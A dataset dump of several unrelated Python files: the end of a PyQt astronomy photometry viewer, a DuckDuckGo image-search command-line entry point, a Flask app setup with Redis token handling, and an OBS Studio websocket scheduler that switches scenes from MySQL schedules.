os.path.join(datasetDirLocal, 'master', 'master_ledoff_subtracted.fits')\n hdu = fits.open(filepath)[0]\n master_ledoff_subtracted = hdu.data\n props = source_properties(data_subtracted, segm,\n error = master_ledoff_subtracted - np.mean(master_ledoff_subtracted),\n background = master_ledoff_subtracted)\n \n # instrumental magnitude = -2.5 * log10(flux)\n for i in range(len(props)):\n props[i].mag_instr = -2.5 * np.log10(props[i].source_sum/exptime)\n # source_sum are by definition background-subtracted already\n propsTableColumns = ['id', 'xcentroid', 'ycentroid', 'area', 'max_value',\n 'source_sum', 'mag_instr']\n # there are other properties available, see list of SourceProperties\n # 
http://photutils.readthedocs.io/en/latest/api/photutils.segmentation.SourceProperties.html#photutils.segmentation.SourceProperties\n \n propsTable = properties_table(props, columns = propsTableColumns)\n self.ui.statusbar.showMessage(repr(propsTable))\n \n # plot segmentated image\n self.rmmpl()\n segFig = Figure()\n cmapRand = random_cmap(segm.max+1, random_state=12345)\n axes = segFig.add_subplot(111)\n axes.imshow(segm, origin='lower', cmap=cmapRand)\n axes.plot(propsTable['xcentroid'], propsTable['ycentroid'], ls='none', color='red',\n marker='+', ms=10, lw=1.5)\n self.addmpl(segFig)\n \n # set properties table font and font size\n self.ui.tablePhot.setCurrentFont(QtGui.QFont('Courier'))\n self.ui.tablePhot.setFontPointSize(9)\n self.ui.tablePhot.setPlainText(repr(propsTable))\n \n self.msg('Photometry completed')\n# # plots for visualisation\n# \n# apertures = []\n# for prop in props:\n# position = (prop.xcentroid.value, prop.ycentroid.value)\n# a = prop.semimajor_axis_sigma.value * 3.0\n# b = prop.semiminor_axis_sigma.value * 3.0\n# theta = prop.orientation.value\n# apertures.append(EllipticalAperture(position, a, b, theta=theta))\n# norm = ImageNormalize(stretch=SqrtStretch())\n# fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(18, 18))\n# \n# if 'bkg' in locals():\n# ax1.imshow(master_subtracted, origin='lower', cmap='Greys_r', norm=norm)\n# else:\n# ax1.imshow(master_subtracted_normalised, origin='lower', cmap='Greys_r', norm=norm)\n# ax2.imshow(segm, origin='lower', cmap=cmapRand)\n# for aperture in apertures:\n# aperture.plot(color='blue', lw=1.5, alpha=0.5, ax=ax1)\n# aperture.plot(color='white', lw=1.5, alpha=1.0, ax=ax2)\n\n#%% Start Qt event loop unless running in interactive mode or using pyside\n\nmain = MainWindow()\n\nif __name__ == '__main__':\n\n if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\n \n def raw_item_changed(curr, prev):\n filename = curr.text()\n main.updateRaw(filename)\n \n def master_item_changed(curr, prev):\n filename = curr.text()\n main.updatePhot(filename)\n\n main.ui.listRaw.currentItemChanged.connect(raw_item_changed)\n main.ui.listMaster.currentItemChanged.connect(master_item_changed)\n \n QtGui.QApplication.instance().exec_()", "sub_path": "pd_fpc_analyses_of_parker/sti_viewer_standalone/sti_gui.py", "file_name": "sti_gui.py", "file_ext": "py", "file_size_in_byte": 16449, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pyqtgraph.mkQApp", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "PyQt4.uic.loadUiType", "line_number": 38, "usage_type": "call"}, {"api_name": "PyQt4.uic", "line_number": 38, 
"usage_type": "name"}, {"api_name": "os.listdir", "line_number": 48, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QThread", "line_number": 57, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 57, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.pyqtSignal", "line_number": 59, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 59, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QThread.__init__", "line_number": 65, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QThread", "line_number": 65, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.figure.Figure", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_qt4agg.FigureCanvasQTAgg", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_qt4agg.NavigationToolbar2QT", "line_number": 134, "usage_type": "call"}, {"api_name": "paramiko.SSHClient", "line_number": 147, "usage_type": "call"}, {"api_name": "paramiko.AutoAddPolicy", "line_number": 148, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 170, "usage_type": "call"}, {"api_name": "os.path", "line_number": 170, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 171, "usage_type": "call"}, {"api_name": "os.path", "line_number": 171, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 202, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 204, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 217, "usage_type": "call"}, {"api_name": "os.path", "line_number": 217, "usage_type": "attribute"}, {"api_name": "astropy.io.fits.open", "line_number": 218, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 218, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFont", "line_number": 221, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 221, "usage_type": "name"}, {"api_name": "numpy.amin", "line_number": 226, "usage_type": "call"}, {"api_name": "numpy.rot90", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 235, "usage_type": "call"}, {"api_name": "os.path", "line_number": 235, "usage_type": "attribute"}, {"api_name": "astropy.io.fits.open", "line_number": 236, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 236, "usage_type": "name"}, {"api_name": "matplotlib.figure.Figure", "line_number": 242, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 245, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 245, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 258, "usage_type": "call"}, {"api_name": "os.path", "line_number": 258, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 259, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 259, "usage_type": "call"}, {"api_name": "os.path", "line_number": 259, "usage_type": "attribute"}, {"api_name": "astropy.io.fits.open", "line_number": 263, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 263, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 266, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 268, "usage_type": "call"}, {"api_name": "astropy.io.fits.open", "line_number": 295, 
"usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 295, "usage_type": "name"}, {"api_name": "photutils.background.Background", "line_number": 305, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 308, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 308, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 308, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 309, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 309, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 313, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 313, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 313, "usage_type": "attribute"}, {"api_name": "astropy.io.fits.PrimaryHDU", "line_number": 317, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 317, "usage_type": "name"}, {"api_name": "astropy.io.fits.PrimaryHDU", "line_number": 320, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 320, "usage_type": "name"}, {"api_name": "photutils.detect_sources", "line_number": 330, "usage_type": "call"}, {"api_name": "photutils.source_properties", "line_number": 338, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 341, "usage_type": "call"}, {"api_name": "os.path", "line_number": 341, "usage_type": "attribute"}, {"api_name": "astropy.io.fits.open", "line_number": 342, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 342, "usage_type": "name"}, {"api_name": "photutils.source_properties", "line_number": 344, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 345, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 350, "usage_type": "call"}, {"api_name": "photutils.properties_table", "line_number": 357, "usage_type": "call"}, {"api_name": "matplotlib.figure.Figure", "line_number": 362, "usage_type": "call"}, {"api_name": "photutils.utils.random_cmap", "line_number": 363, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QFont", "line_number": 371, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 371, "usage_type": "name"}, {"api_name": "sys.flags", "line_number": 403, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 403, "usage_type": "argument"}, {"api_name": "PyQt4.QtGui.QApplication.instance", "line_number": 416, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QApplication", "line_number": 416, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 416, "usage_type": "name"}]} {"seq_id": "523108934", "text": "from .api import search\nimport sys\nimport json\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print(\"Search term needed!\")\n print(\"Usage: python -m duckduckgo_images_api TERM count(optional)\")\n else:\n count = 40\n if (len(sys.argv) > 2):\n count = int(sys.argv[2])\n print(json.dumps(search(sys.argv[1], count)))", "sub_path": "duckduckgo_images_api/__main__.py", "file_name": "__main__.py", "file_ext": "py", "file_size_in_byte": 366, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "sys.argv", "line_number": 6, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 11, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 12, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 13, "usage_type": "call"}, 
{"api_name": "api.search", "line_number": 13, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 13, "usage_type": "attribute"}]} {"seq_id": "589801713", "text": "# -*- coding:utf-8 -*-\n\n\nfrom flask import (\n g,\n Flask,\n request\n)\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom poseidon.utils.token import TokenManager\nfrom poseidon.utils.sku import SkuManager\nfrom poseidon.settings import (\n MYSQL_CONFIG,\n REDIS_CONFIG,\n REDIS_TOKEN_EXPIRE,\n INIT_SKU\n)\n\napp = Flask(__name__)\n\n# sqlalchemy\napp.config['SQLALCHEMY_DATABASE_URI'] =\\\n 'mysql+pymysql://{username}:{password}@{host}:{port}/{database}'.format(\n **MYSQL_CONFIG)\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\napp.config['SQLALCHEMY_POOL_RECYCLE'] = 1200\napp.config['SQLALCHEMY_POOL_SIZE'] = 10\napp.config['SQLALCHEMY_MAX_OVERFLOW'] = -1\ndb = SQLAlchemy(app)\n\n# redis token\ntoken_manager = TokenManager(REDIS_CONFIG, REDIS_TOKEN_EXPIRE)\n# redis sku\nsku_manager = SkuManager(INIT_SKU, REDIS_CONFIG)\n\n# from restful_doc import auto_doc\nfrom poseidon import api\n# api.api_init = auto_doc(app, True, 'docs/api_doc.md',\n# 'markdown')(api.api_init) #noqa\napp = api.api_init(app)\n\n# add ping\napp.route('/ping')(lambda: 'PONG')\n\n\n@app.before_request\ndef before_hook():\n token = request.headers.get('x-token')\n user_id = token_manager.get_user(token)\n if user_id:\n g.user_id = user_id\n", "sub_path": "poseidon/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 1229, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "flask.Flask", "line_number": 19, "usage_type": "call"}, {"api_name": "poseidon.settings.MYSQL_CONFIG", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.ext.sqlalchemy.SQLAlchemy", "line_number": 29, "usage_type": "call"}, {"api_name": "poseidon.utils.token.TokenManager", "line_number": 32, "usage_type": "call"}, {"api_name": "poseidon.settings.REDIS_CONFIG", "line_number": 32, "usage_type": "argument"}, {"api_name": "poseidon.settings.REDIS_TOKEN_EXPIRE", "line_number": 32, "usage_type": "argument"}, {"api_name": "poseidon.utils.sku.SkuManager", "line_number": 34, "usage_type": "call"}, {"api_name": "poseidon.settings.INIT_SKU", "line_number": 34, "usage_type": "argument"}, {"api_name": "poseidon.settings.REDIS_CONFIG", "line_number": 34, "usage_type": "argument"}, {"api_name": "poseidon.api.api_init", "line_number": 40, "usage_type": "call"}, {"api_name": "poseidon.api", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 48, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 48, "usage_type": "name"}, {"api_name": "flask.g.user_id", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 51, "usage_type": "name"}]} {"seq_id": "561655825", "text": "#!/usr/bin/env python\n\nimport sys\nimport time\nimport logging\nfrom datetime import datetime\nfrom datetime import timedelta \nimport socket\nimport websocket #pip install websocket-client\nimport hashlib\nimport base64\nimport json\nimport mysql.connector #pip install mysql-connector-python\nfrom mysql.connector import Error\ntry:\n import thread\nexcept ImportError:\n import _thread as thread\n\n\n#MariaDB settings. 
Port = 3306 or 3307\nmysqlconfig = {\n    'user': 'user',\n    'password': 'pass',\n    'host': 'localhost',\n    'port': '3306',\n    'database': 'OBSdb',\n    'raise_on_warnings': True\n}\n\nwritelog = 0\n\nargs = sys.argv[1:]\nif len(args):\n\tCW = args[0]\n\tif CW == '-l':\n\t\twritelog = 1\n\t\tprint (\"Logfile will be made.\")\n\nif writelog:\n\tlogging.basicConfig(filename=time.strftime(\"%Y%m%d%H%M%S\") + '.log', level=logging.INFO)\n\tlogging.info('Started')\n \ntry:\n\tconnection = mysql.connector.connect(**mysqlconfig)\n\tif connection.is_connected():\n\t\tdb_Info = connection.get_server_info()\n\t\tprint(\"Connected to MySQL Server version \", db_Info)\n\t\tif writelog:\n\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": Connected to MySQL Server version \" + db_Info)\n\t\tmycursor = connection.cursor(dictionary=True)\n\t\tmycursor.execute(\"SELECT * FROM host\")\n\t\trecords = mycursor.fetchall()\n\t\tfor row in records:\n\t\t\thost = row[\"hostname\"]\n\t\t\tport = row[\"port\"]\n\t\t\tpassword = row[\"pass\"]\nexcept Error as e:\n\tprint(\"Error while connecting to MySQL\", e)\n\tif writelog:\n\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": Error while connecting to MySQL\" + str(e))\n\t\ntry:\n\tconnectionthread = mysql.connector.connect(**mysqlconfig)\n\tif connectionthread.is_connected():\n\t\tdb_Info = connectionthread.get_server_info()\n\t\tprint(\"Thread connected to MySQL Server version \", db_Info)\n\t\tif writelog:\n\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": Thread connected to MySQL Server version \" + db_Info)\nexcept Error as e:\n\tprint(\"Error while connecting to MySQL\", e)\n\tif writelog:\n\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": Error while connecting thread to MySQL\" + str(e))\n\n\nStudioMode = False\nobsconnected = False\nexporttime = [0,500,1000,1500,2000,2500,3000,3500,4000,4500,5000,5500]\n#exporttime = [0,1000,2000,3000,4000,5000] # every hour at mmss. 
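As context for the exporttime list just above: later in this file the main loop packs the current minute and second into one integer with time.strftime("%M%S") and tests list membership, so each entry is a minutes*100 + seconds tick. A tiny illustration of that packing, a sketch reusing the same calls the file makes (the example list values are illustrative):

import time

# At 05:00 past the hour, time.strftime("%M%S") returns "0500" -> int 500,
# so a list like [0, 500, 1000, ...] fires every five minutes, on the minute.
timenow = int(time.strftime("%M%S", time.localtime()))
if timenow in [0, 500, 1000, 1500]:
    print("export tick at", timenow)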
100 = 1 minute after each hour, 1500 = 15 minutes after each hour.\n#[0,1000,2000,3000,4000,5000] = export every 10 minutes\nGetAuthRequired = {\"request-type\" : \"GetAuthRequired\" ,\"message-id\" : \"1\"};\nGetStudioModeStatus = {\"request-type\" : \"GetStudioModeStatus\" , \"message-id\" : \"GetStudioModeStatus\"}\nGetSceneList = {\"request-type\" : \"GetSceneList\" , \"message-id\" : \"getSceneList\"}\nGetSourcesList = {\"request-type\" : \"GetSourcesList\" , \"message-id\" : \"GetSourcesList\"}\nGetTransitionList = {\"request-type\": \"GetTransitionList\",\"message-id\" : \"GetTransitionList\"}\n\nwhile True:\n\ttry:\n\t\tdef on_message(ws, message):\n\t\t\tdata = json.loads(message)\n\t\t\t#print (data[\"message-id\"])\n\t\t\t#print (data)\n\t\t\tglobal obsconnected\n\t\t\tif \"error\" in data:\n\t\t\t\tif (data[\"error\"] == \"Authentication Failed.\"):\n\t\t\t\t\tprint(\"Authentication Failed.\")\n\t\t\t\t\tif writelog:\n\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": Authentication Failed.\")\n\t\t\t\t\tws.keep_running = False\n\t\t\t\telse:\n\t\t\t\t\tprint (data)\n\t\t\t\t\tmessage = str(data)\n\t\t\t\t\tif writelog:\n\t\t\t\t\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + message)\n\t\t\telif \"message-id\" in data:\n\t\t\t\tif (data[\"message-id\"] == \"GetStudioModeStatus\"):\n\t\t\t\t\tglobal StudioMode\n\t\t\t\t\tStudioMode = data[\"studio-mode\"]\n\t\t\t\telif (data[\"message-id\"] == \"getSceneList\"):\n\t\t\t\t\tif not connection.is_connected():\n\t\t\t\t\t\t\tconnection.reconnect(attempts=5, delay=0)\n\t\t\t\t\tmycursor = connection.cursor()\n\t\t\t\t\tmycursor.execute(\"TRUNCATE TABLE scenenames\")\n\t\t\t\t\tconnection.commit()\n\t\t\t\t\tmycursor = connection.cursor()\n\t\t\t\t\tmycursor.execute(\"TRUNCATE TABLE sourcenames\")\n\t\t\t\t\tconnection.commit()\n\t\t\t\t\tfor name in data['scenes']:\n\t\t\t\t\t\tscene = name['name']\n\t\t\t\t\t\tif not connection.is_connected():\n\t\t\t\t\t\t\tconnection.reconnect(attempts=5, delay=0)\n\t\t\t\t\t\tmycursor = connection.cursor()\n\t\t\t\t\t\tqry = \"INSERT INTO scenenames(scene) VALUES('\" + scene + \"')\"\n\t\t\t\t\t\tmycursor.execute(qry)\n\t\t\t\t\t\tconnection.commit()\n\t\t\t\t\t\tfor name in name['sources']:\n\t\t\t\t\t\t\tsourcename = name['name']\n\t\t\t\t\t\t\tmycursor = connection.cursor()\n\t\t\t\t\t\t\tqry = \"INSERT INTO sourcenames(scene,source) VALUES('\" + scene + \"' , '\" + sourcename + \"')\"\n\t\t\t\t\t\t\tif not connection.is_connected():\n\t\t\t\t\t\t\t\tconnection.reconnect(attempts=5, delay=0)\n\t\t\t\t\t\t\tmycursor.execute(qry)\n\t\t\t\t\t\t\tconnection.commit()\n\t\t\t\telif (data[\"message-id\"] == \"GetTransitionList\"):\n\t\t\t\t\tif not connection.is_connected():\n\t\t\t\t\t\t\tconnection.reconnect(attempts=5, delay=0)\n\t\t\t\t\tmycursor = connection.cursor()\n\t\t\t\t\tmycursor.execute(\"TRUNCATE TABLE transitionnames\")\n\t\t\t\t\tconnection.commit()\n\t\t\t\t\tfor i in data['transitions']:\n\t\t\t\t\t\ttrans_type = i['name']\n\t\t\t\t\t\tif not connection.is_connected():\n\t\t\t\t\t\t\tconnection.reconnect(attempts=5, delay=0)\n\t\t\t\t\t\tmycursor = connection.cursor()\n\t\t\t\t\t\tqry = \"INSERT INTO transitionnames(transition) VALUES('\" + trans_type + \"')\"\n\t\t\t\t\t\tmycursor.execute(qry)\n\t\t\t\t\t\tconnection.commit()\n\t\t\t\telif (data[\"message-id\"] == \"SetCurrentTransition\"):\n\t\t\t\t\tprint(\"SetCurrentTransition\")\n\t\t\t\t#elif (data[\"authRequired\"]):\n\t\t\t\telif (data[\"message-id\"] == \"1\"):\n\t\t\t\t\tprint(\"Authentication 
required\")\n\t\t\t\t\tsecret = base64.b64encode(hashlib.sha256((password + data['salt']).encode('utf-8')).digest())\n\t\t\t\t\tauth = base64.b64encode(hashlib.sha256(secret + data['challenge'].encode('utf-8')).digest()).decode('utf-8')\n\t\t\t\t\tauth_payload = {\"request-type\": \"Authenticate\", \"message-id\": \"2\", \"auth\": auth}\n\t\t\t\t\tws.send(json.dumps(auth_payload))\n\t\t\t\t\tobsconnected = True\n\t\t\t\telif (data[\"message-id\"] == \"2\"):\n\t\t\t\t\tprint(\"Login pass\")\n\t\t\t\telif (data[\"message-id\"] == \"SetCurrentScene\") or (data[\"message-id\"] == \"SetSceneItemProperties\") or (data[\"message-id\"] == \"SetPreviewScene\") :\n\t\t\t\t\tTrue\n\t\t\t\telse:\n\t\t\t\t\tprint(data)\n\t\t\t\t\tmessage = str(data)\n\t\t\t\t\tif writelog:\n\t\t\t\t\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + message)\n\t\t\t\t\tobsconnected = True\n\t\t\telif \"update-type\" in message:\n\t\t\t\tif (data[\"update-type\"] == \"StudioModeSwitched\"):\n\t\t\t\t\tStudioMode = data[\"new-state\"]\n\n\t\tdef on_error(ws, error):\n\t\t\tprint(error)\n\t\t\tif writelog:\n\t\t\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + str(error))\n\t\t\tws.close()\n\n\t\tdef on_close(ws):\n\t\t\tprint(\"On Close Connection error.\")\n\t\t\tif writelog:\n\t\t\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": On Close Connection error.\")\n\t\t\t#stop on_open while loop\n\t\t\tglobal obsconnected\n\t\t\tobsconnected = False\n\t\t\tws.keep_running = False\n\t\t\ttime.sleep(30)\n\n\t\tdef on_open(ws):\n\t\t\tdef run(*args):\n\t\t\t\tws.send(json.dumps(GetAuthRequired))\n\t\t\t\ttime.sleep(2)\n\t\t\t\tif ws.sock:\n\t\t\t\t\tws.send(json.dumps(GetStudioModeStatus))\n\t\t\t\t\tglobal obsconnected\n\t\t\t\t\tweekdays = (\"ma\",\"di\",\"wo\",\"do\",\"vr\",\"za\",\"zo\") #Dutch\n\t\t\t\t\twhile obsconnected == True:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tdayrun = False\n\t\t\t\t\t\t\tcurrentdtime = time.strftime(\"%Y%m%d%H%M%S\",time.localtime())\n\t\t\t\t\t\t\ttimenow = time.strftime(\"%H:%M:%S\",time.localtime())\n\t\t\t\t\t\t\tif not connectionthread.is_connected():\n\t\t\t\t\t\t\t\tconnectionthread.reconnect(attempts=5, delay=0)\n\t\t\t\t\t\t\tmycursor = connectionthread.cursor(dictionary=True)\n\t\t\t\t\t\t\tgetqry = \"SELECT * FROM schedules WHERE processed = 0\"\n\t\t\t\t\t\t\tmycursor.execute(getqry)\n\t\t\t\t\t\t\trecords = mycursor.fetchall()\n\t\t\t\t\t\t\tprint(time.strftime(\"%H:%M:%S\",time.localtime()))\n\t\t\t\t\t\t\tfor row in records:\n\t\t\t\t\t\t\t\tlogrow = str(row)\n\t\t\t\t\t\t\t\tid = row[\"id\"]\n\t\t\t\t\t\t\t\tswtime = row[\"swtime\"]\n\t\t\t\t\t\t\t\tswdate = row[\"swdate\"]\n\t\t\t\t\t\t\t\ttime_object = datetime.strptime(str(swtime), '%H:%M:%S').time()\n\t\t\t\t\t\t\t\tdate_object = datetime.strptime(str(swdate), '%Y-%m-%d').date()\n\t\t\t\t\t\t\t\tdatetime_str = datetime.combine(date_object , time_object)\n\t\t\t\t\t\t\t\tdtime = datetime_str.strftime(\"%Y%m%d%H%M%S\")\n\t\t\t\t\t\t\t\tscene = row[\"scene\"]\n\t\t\t\t\t\t\t\ttrans_type = row[\"transition\"]\n\t\t\t\t\t\t\t\tsourceoff = row[\"sourceoff\"] #source in this scene to switch off\n\t\t\t\t\t\t\t\tsourceon = row[\"sourceon\"] #source in this scene to switch on\n\t\t\t\t\t\t\t\trepeattime = row[\"repeattime\"]\n\t\t\t\t\t\t\t\tscenesourceoff = row[\"scenesourceoff\"]\n\t\t\t\t\t\t\t\tscenesourceon = row[\"scenesourceon\"]\n\t\t\t\t\t\t\t\tif timenow == datetime_str.strftime(\"%H:%M:%S\"):\n\t\t\t\t\t\t\t\t\tif weekdays[datetime.today().weekday()] in repeattime:\n\t\t\t\t\t\t\t\t\t\tdayrun = 
True\n\t\t\t\t\t\t\t\tif currentdtime == dtime or dayrun:\n\t\t\t\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + logrow)\n\t\t\t\t\t\t\t\t\tif len(sourceon) > 0:\n\t\t\t\t\t\t\t\t\t\t#first set correct scene in preview\n\t\t\t\t\t\t\t\t\t\tmessage = {\"request-type\" : \"SetPreviewScene\" , \"message-id\" : \"SetPreviewScene\" , \"scene-name\" : scenesourceon};\n\t\t\t\t\t\t\t\t\t\tlogmessage = str(message)\n\t\t\t\t\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + logmessage)\n\t\t\t\t\t\t\t\t\t\tws.send(json.dumps(message))\n\t\t\t\t\t\t\t\t\t\t#set source properties\n\t\t\t\t\t\t\t\t\t\tmessage={\"request-type\" : \"SetSceneItemProperties\" , \"message-id\" : \"SetSceneItemProperties\" , \"scene-name\" : scenesourceon , \"item\" : sourceon , \"visible\": True };\n\t\t\t\t\t\t\t\t\t\tlogmessage = str(message)\n\t\t\t\t\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + logmessage)\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\tws.send(json.dumps(message))\n\t\t\t\t\t\t\t\t\tif len(sourceoff) > 0:\n #delay,else to fast for OBS\n\t\t\t\t\t\t\t\t\t\ttime.sleep(2)\n\t\t\t\t\t\t\t\t\t\tmessage = {\"request-type\" : \"SetPreviewScene\" , \"message-id\" : \"SetPreviewScene\" , \"scene-name\" : scenesourceoff};\n\t\t\t\t\t\t\t\t\t\tlogmessage = str(message)\n\t\t\t\t\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + logmessage)\n\t\t\t\t\t\t\t\t\t\tws.send(json.dumps(message))\n\t\t\t\t\t\t\t\t\t\tmessage={\"request-type\" : \"SetSceneItemProperties\" , \"message-id\" : \"SetSceneItemProperties\" , \"scene-name\" : scenesourceoff , \"item\" : sourceoff , \"visible\": False };\n\t\t\t\t\t\t\t\t\t\tlogmessage = str(message)\n\t\t\t\t\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + logmessage)\n\t\t\t\t\t\t\t\t\t\tws.send(json.dumps(message))\n\t\t\t\t\t\t\t\t\tmessage={\"request-type\" : \"SetCurrentTransition\" , \"message-id\" : \"SetCurrentTransition\" ,\"transition-name\":trans_type};\n\t\t\t\t\t\t\t\t\tws.send(json.dumps(message))\n\t\t\t\t\t\t\t\t\tmessage = {\"request-type\" : \"SetCurrentScene\" , \"message-id\" : \"SetCurrentScene\" , \"scene-name\" : scene};\n\t\t\t\t\t\t\t\t\tws.send(json.dumps(message))\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tif not connectionthread.is_connected():\n\t\t\t\t\t\t\t\t\t\tconnectionthread.reconnect(attempts=5, delay=0)\n\t\t\t\t\t\t\t\t\tmycursor = connectionthread.cursor()\n\t\t\t\t\t\t\t\t\tif len(repeattime) > 0 and not dayrun:\n\t\t\t\t\t\t\t\t\t\tif \",\" in repeattime:\n\t\t\t\t\t\t\t\t\t\t\trepeattimenew = repeattime.split(',')[0]\n\t\t\t\t\t\t\t\t\t\t\trepeattimenumber = repeattime.split(',')[1]\n\t\t\t\t\t\t\t\t\t\t\tif repeattimenumber == \"0\": #continuous\n\t\t\t\t\t\t\t\t\t\t\t\tnewdtime = datetime_str + timedelta(minutes=int(repeattimenew))\n\t\t\t\t\t\t\t\t\t\t\t\tnew_time_object = datetime.time(newdtime)\n\t\t\t\t\t\t\t\t\t\t\t\tnew_date_object = datetime.date(newdtime)\n\t\t\t\t\t\t\t\t\t\t\t\tqry = \"UPDATE schedules SET swtime = '\" + new_time_object.strftime(\"%H:%M:%S\") + \"', swdate ='\" + new_date_object.strftime(\"%Y-%m-%d\") + \"' WHERE id = \" + str(id) + \";\"\n\t\t\t\t\t\t\t\t\t\t\telif repeattimenumber == \"1\": #last run was done\n\t\t\t\t\t\t\t\t\t\t\t\tqry = \"UPDATE schedules SET processed = 1 WHERE id = \" + str(id) + \";\"\n\t\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\t\tnewdtime = datetime_str + 